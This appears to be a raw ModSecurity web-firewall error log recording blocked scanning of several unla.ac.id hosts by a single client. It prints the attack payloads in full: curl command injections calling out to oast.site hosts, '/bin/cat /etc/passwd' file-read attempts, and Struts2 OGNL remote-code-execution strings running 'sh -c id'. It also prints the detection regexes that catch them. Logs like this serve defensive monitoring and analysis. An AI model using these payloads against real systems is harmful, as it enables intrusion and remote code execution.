[Tue Aug 29 11:33:48.394340 2023] [:error] [pid 1137] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:ssid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: curl found within ARGS:ssid: \\x22'; curl http:/cjmn8l5jmimk2adbbnlgo3uou5xa15bzp.oast.site -H 'User-Agent: CRvF1U'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/"] [unique_id "ZO11LMCo-f0AAARxOr4AAAAa"]
[Tue Aug 29 11:33:48.405169 2023] [:error] [pid 1128] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at REQUEST_COOKIES_NAMES:/bin/cat /etc/passwd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within REQUEST_COOKIES_NAMES:/bin/cat /etc/passwd: /bin/cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.unla.ac.id"] [uri "/test.cgi"] [unique_id "ZO11LMCo-f0AAARo83sAAAAT"]
[Tue Aug 29 11:33:49.308138 2023] [:error] [pid 1123] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:uid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: curl found within ARGS:uid: 10; curl http:/cjmn8l5jmimk2adbbnlg4kd47ojozztgo.oast.site -H 'User-Agent: jT3jXs'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/system/sharedir.php"] [unique_id "ZO11LcCo-f0AAARjjSEAAAAL"]
[Tue Aug 29 11:33:49.309225 2023] [:error] [pid 1138] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:uid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: curl found within ARGS:uid: 10; curl http:/cjmn8l5jmimk2adbbnlgko6zh8z8xjohx.oast.site -H 'User-Agent: jT3jXs'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/system/sharedir.php"] [unique_id "ZO11LcCo-f0AAARy-0YAAAAb"]
[Tue Aug 29 11:33:49.312493 2023] [:error] [pid 1150] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:uid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: curl found within ARGS:uid: 10; curl http:/cjmn8l5jmimk2adbbnlgn6btmmmwd31wr.oast.site -H 'User-Agent: jT3jXs'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/system/sharedir.php"] [unique_id "ZO11LcCo-f0AAAR@KIQAAAAF"]
[Tue Aug 29 11:33:49.318992 2023] [:error] [pid 1152] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:uid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: curl found within ARGS:uid: 10; curl http:/cjmn8l5jmimk2adbbnlgeb5u1k1mcdm3h.oast.site -H 'User-Agent: jT3jXs'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/system/sharedir.php"] [unique_id "ZO11LcCo-f0AAASAHdoAAAAH"]
[Tue Aug 29 11:33:49.336077 2023] [:error] [pid 1123] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:ssid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: curl found within ARGS:ssid: \\x22'; curl http:/cjmn8l5jmimk2adbbnlgm5g8jnxgxuhgb.oast.site -H 'User-Agent: CRvF1U'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/"] [unique_id "ZO11LcCo-f0AAARjjSIAAAAL"]
[Tue Aug 29 11:33:49.336221 2023] [:error] [pid 876] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:ssid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: curl found within ARGS:ssid: \\x22'; curl http:/cjmn8l5jmimk2adbbnlg3msm1qykdpkbc.oast.site -H 'User-Agent: CRvF1U'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/"] [unique_id "ZO11LcCo-f0AAANsAl4AAAAD"]
[Tue Aug 29 11:33:49.346818 2023] [:error] [pid 1152] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS_NAMES:redirect:${#a=(new java.lang.ProcessBuilder(new java.lang.String[]{'sh','-c','id'})).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#matt=#context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),#matt.getWriter().println(#e),#matt.getWriter().flush(),#matt.getWriter().close()}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: {#a=(new  found within ARGS_NAMES:redirect:${#a=(new java.lang.ProcessBuilder(new java.lang.String[]{'sh','-c','id'})).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#matt=#context.get('com.opensymphon [hostname "informatika.unla.ac.id"] [uri "/login.action"] [unique_id "ZO11LcCo-f0AAASAHdsAAAAH"]
[Tue Aug 29 11:33:49.369730 2023] [:error] [pid 1117] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at REQUEST_COOKIES_NAMES:/bin/cat /etc/passwd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within REQUEST_COOKIES_NAMES:/bin/cat /etc/passwd: /bin/cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.unla.ac.id"] [uri "/debug.cgi"] [unique_id "ZO11LcCo-f0AAARdiMYAAAAK"]
[Tue Aug 29 11:33:49.390794 2023] [:error] [pid 1152] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS_NAMES:redirect:${#a=(new java.lang.ProcessBuilder(new java.lang.String[]{'sh','-c','id'})).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#matt=#context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),#matt.getWriter().println(#e),#matt.getWriter().flush(),#matt.getWriter().close()}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: {#a=(new  found within ARGS_NAMES:redirect:${#a=(new java.lang.ProcessBuilder(new java.lang.String[]{'sh','-c','id'})).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#matt=#context.get('com.opensymphon [hostname "unla.ac.id"] [uri "/login.action"] [unique_id "ZO11LcCo-f0AAASAHd0AAAAH"]
[Tue Aug 29 11:33:49.394690 2023] [:error] [pid 1156] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS_NAMES:redirect:${#a=(new java.lang.ProcessBuilder(new java.lang.String[]{'sh','-c','id'})).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#matt=#context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),#matt.getWriter().println(#e),#matt.getWriter().flush(),#matt.getWriter().close()}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: {#a=(new  found within ARGS_NAMES:redirect:${#a=(new java.lang.ProcessBuilder(new java.lang.String[]{'sh','-c','id'})).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#matt=#context.get('com.opensymphon [hostname "pusatbahasa.unla.ac.id"] [uri "/login.action"] [unique_id "ZO11LcCo-f0AAASEJQUAAAAE"]
[Tue Aug 29 11:33:49.407173 2023] [:error] [pid 1133] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS_NAMES:redirect:${#a=(new java.lang.ProcessBuilder(new java.lang.String[]{'sh','-c','id'})).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#matt=#context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),#matt.getWriter().println(#e),#matt.getWriter().flush(),#matt.getWriter().close()}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: {#a=(new  found within ARGS_NAMES:redirect:${#a=(new java.lang.ProcessBuilder(new java.lang.String[]{'sh','-c','id'})).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#matt=#context.get('com.opensymphon [hostname "ft.unla.ac.id"] [uri "/login.action"] [unique_id "ZO11LcCo-f0AAARtAB8AAAAV"]
[Tue Aug 29 11:33:49.417486 2023] [:error] [pid 876] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS_NAMES:redirect:${#a=(new java.lang.ProcessBuilder(new java.lang.String[]{'sh','-c','id'})).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#matt=#context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),#matt.getWriter().println(#e),#matt.getWriter().flush(),#matt.getWriter().close()}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: {#a=(new  found within ARGS_NAMES:redirect:${#a=(new java.lang.ProcessBuilder(new java.lang.String[]{'sh','-c','id'})).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#matt=#context.get('com.opensymphon [hostname "journal.unla.ac.id"] [uri "/login.action"] [unique_id "ZO11LcCo-f0AAANsAmAAAAAD"]
[Tue Aug 29 11:33:49.428953 2023] [:error] [pid 1157] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:ssid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: curl found within ARGS:ssid: \\x22'; curl http:/cjmn8l5jmimk2adbbnlgnwf3xhhifybjx.oast.site -H 'User-Agent: CRvF1U' #"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/"] [unique_id "ZO11LcCo-f0AAASFed0AAAAG"]
[Tue Aug 29 11:33:50.307953 2023] [:error] [pid 876] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:task_number. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: curl found within ARGS:task_number: 1;curl http:/cjmn8l5jmimk2adbbnlgep43kcxgbqqg8.oast.site -H 'User-Agent: jT3jXs'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/en/php/usb_sync.php"] [unique_id "ZO11LsCo-f0AAANsAmEAAAAD"]
[Tue Aug 29 11:33:50.313103 2023] [:error] [pid 1157] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS_NAMES:redirect:${#context["xwork.MethodAccessor.denyMethodExecution"]=false,#f=#_memberAccess.getClass().getDeclaredField("allowStaticMethodAccess"),#f.setAccessible(true),#f.set(#_memberAccess,true),#a=@java.lang.Runtime@getRuntime().exec("sh -c id").getInputStream(),#b=new java.io.InputStreamReader(#a),#c=new java.io.BufferedReader(#b),#d=new char[5000],#c.read(#d),#genxor=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse").getWriter(),#genxor.println(#d),#genxor.flush(),#genxor.close()}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: {#context[\\x22xwork.MethodAccessor.denyMethodExecution\\x22]=false,#f=#_memberAccess.getClass().getDeclaredField(\\x22allowStaticMethodAccess\\x22),#f.setAccess [hostname "unla.ac.id"] [uri "/index.action"] [unique_id "ZO11LsCo-f0AAASFed4AAAAG"]
[Tue Aug 29 11:33:50.315801 2023] [:error] [pid 1150] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS_NAMES:redirect:${#context["xwork.MethodAccessor.denyMethodExecution"]=false,#f=#_memberAccess.getClass().getDeclaredField("allowStaticMethodAccess"),#f.setAccessible(true),#f.set(#_memberAccess,true),#a=@java.lang.Runtime@getRuntime().exec("sh -c id").getInputStream(),#b=new java.io.InputStreamReader(#a),#c=new java.io.BufferedReader(#b),#d=new char[5000],#c.read(#d),#genxor=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse").getWriter(),#genxor.println(#d),#genxor.flush(),#genxor.close()}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: {#context[\\x22xwork.MethodAccessor.denyMethodExecution\\x22]=false,#f=#_memberAccess.getClass().getDeclaredField(\\x22allowStaticMethodAccess\\x22),#f.setAccess [hostname "informatika.unla.ac.id"] [uri "/index.action"] [unique_id "ZO11LsCo-f0AAAR@KIkAAAAF"]
[Tue Aug 29 11:33:50.326583 2023] [:error] [pid 1156] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS_NAMES:redirect:${#context["xwork.MethodAccessor.denyMethodExecution"]=false,#f=#_memberAccess.getClass().getDeclaredField("allowStaticMethodAccess"),#f.setAccessible(true),#f.set(#_memberAccess,true),#a=@java.lang.Runtime@getRuntime().exec("sh -c id").getInputStream(),#b=new java.io.InputStreamReader(#a),#c=new java.io.BufferedReader(#b),#d=new char[5000],#c.read(#d),#genxor=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse").getWriter(),#genxor.println(#d),#genxor.flush(),#genxor.close()}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: {#context[\\x22xwork.MethodAccessor.denyMethodExecution\\x22]=false,#f=#_memberAccess.getClass().getDeclaredField(\\x22allowStaticMethodAccess\\x22),#f.setAccess [hostname "pusatbahasa.unla.ac.id"] [uri "/index.action"] [unique_id "ZO11LsCo-f0AAASEJQgAAAAE"]
[Tue Aug 29 11:33:50.336704 2023] [:error] [pid 1152] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:task_number. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: curl found within ARGS:task_number: 1;curl http:/cjmn8l5jmimk2adbbnlgtu31ccw41xqoj.oast.site -H 'User-Agent: jT3jXs'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/en/php/usb_sync.php"] [unique_id "ZO11LsCo-f0AAASAHeAAAAAH"]
[Tue Aug 29 11:33:50.342300 2023] [:error] [pid 1157] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:task_number. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: curl found within ARGS:task_number: 1;curl http:/cjmn8l5jmimk2adbbnlgkpthq6f3aqq1k.oast.site -H 'User-Agent: jT3jXs'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/en/php/usb_sync.php"] [unique_id "ZO11LsCo-f0AAASFed8AAAAG"]
[Tue Aug 29 11:33:50.347690 2023] [:error] [pid 1104] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at REQUEST_COOKIES_NAMES:/bin/cat /etc/passwd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within REQUEST_COOKIES_NAMES:/bin/cat /etc/passwd: /bin/cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.unla.ac.id"] [uri "/cgi-bin/test-cgi"] [unique_id "ZO11LsCo-f0AAARQ4CwAAAAB"]
[Tue Aug 29 11:33:50.367034 2023] [:error] [pid 1138] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:task_number. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: curl found within ARGS:task_number: 1;curl http:/cjmn8l5jmimk2adbbnlgtg4pfr6xnc7ay.oast.site -H 'User-Agent: jT3jXs'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/en/php/usb_sync.php"] [unique_id "ZO11LsCo-f0AAARy-0oAAAAb"]
[Tue Aug 29 11:33:50.384233 2023] [:error] [pid 1123] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS_NAMES:redirect:${#context["xwork.MethodAccessor.denyMethodExecution"]=false,#f=#_memberAccess.getClass().getDeclaredField("allowStaticMethodAccess"),#f.setAccessible(true),#f.set(#_memberAccess,true),#a=@java.lang.Runtime@getRuntime().exec("sh -c id").getInputStream(),#b=new java.io.InputStreamReader(#a),#c=new java.io.BufferedReader(#b),#d=new char[5000],#c.read(#d),#genxor=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse").getWriter(),#genxor.println(#d),#genxor.flush(),#genxor.close()}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: {#context[\\x22xwork.MethodAccessor.denyMethodExecution\\x22]=false,#f=#_memberAccess.getClass().getDeclaredField(\\x22allowStaticMethodAccess\\x22),#f.setAccess [hostname "ft.unla.ac.id"] [uri "/index.action"] [unique_id "ZO11LsCo-f0AAARjjSkAAAAL"]
[Tue Aug 29 11:33:50.387397 2023] [:error] [pid 1138] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS_NAMES:redirect:${#context["xwork.MethodAccessor.denyMethodExecution"]=false,#f=#_memberAccess.getClass().getDeclaredField("allowStaticMethodAccess"),#f.setAccessible(true),#f.set(#_memberAccess,true),#a=@java.lang.Runtime@getRuntime().exec("sh -c id").getInputStream(),#b=new java.io.InputStreamReader(#a),#c=new java.io.BufferedReader(#b),#d=new char[5000],#c.read(#d),#genxor=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse").getWriter(),#genxor.println(#d),#genxor.flush(),#genxor.close()}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment 